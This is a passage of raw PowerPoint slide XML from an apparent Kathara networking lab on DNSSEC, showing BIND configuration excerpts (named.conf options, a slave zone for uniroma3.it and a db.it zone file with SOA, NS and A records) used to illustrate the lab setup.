                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zone "uniroma3.it" {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>type</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> slave;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file "/var/cache/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/db.uniroma3.transfered";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    masters { 110.0.0.10; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58822B47-3ED0-D261-41E5-76A612446701}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969" cy="151"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/dnsuni2/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207800035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C1DA49-DB8F-8DB5-2DDA-0F8D59652F8A}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DCF5FFF-B6D9-D9D2-17DE-550B42BF32E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF71402-9B85-097A-5312-59FA8FA9EAB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{317B63F4-3578-00F0-75C1-873F5AE8E3C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{387A7D00-6D30-A0FF-9D3F-27FB025609E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="1866273"/>
            <a:ext cx="7087578" cy="3125454"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="1232"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE5269B-47AF-43CB-626A-9B86243B8E8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="1174"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$TTL 60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     dnsit.it.    root.dnsit.it. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120402 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      dnsit.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit.it.       IN      A       10.0.3.10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniroma3.it.    IN      NS      dnsuni.uniroma3.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniroma3.it.    IN      NS      dnsuni2.uniroma3.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni.uniroma3.it. IN  A       110.0.0.10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni2.uniroma3.it. IN A       100.0.75.10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81BE16E1-73FA-0970-56A3-F6517B0075E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969" cy="151"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/dnsit/etc/bind/db.it</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122397045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58B596-41F8-7517-54A7-3821A0B9F2E1}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CB1A639-7285-08CC-F554-08BE9CD2A460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D24C76B2-B6F5-7D3C-5499-4B6071508851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{190015A4-3E4C-F69E-E1C8-F5D6E6EEB64C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2150856B-EABC-BDC3-5762-113F8B140AF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2253149"/>
            <a:ext cx="7087578" cy="2351701"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="927"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91C11999-7438-E3B5-9FDF-811C1B7EDA49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="869"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>options {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory "/var/cache/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>allow</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-query { </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>any</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>recursion</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> no;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec-validation</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
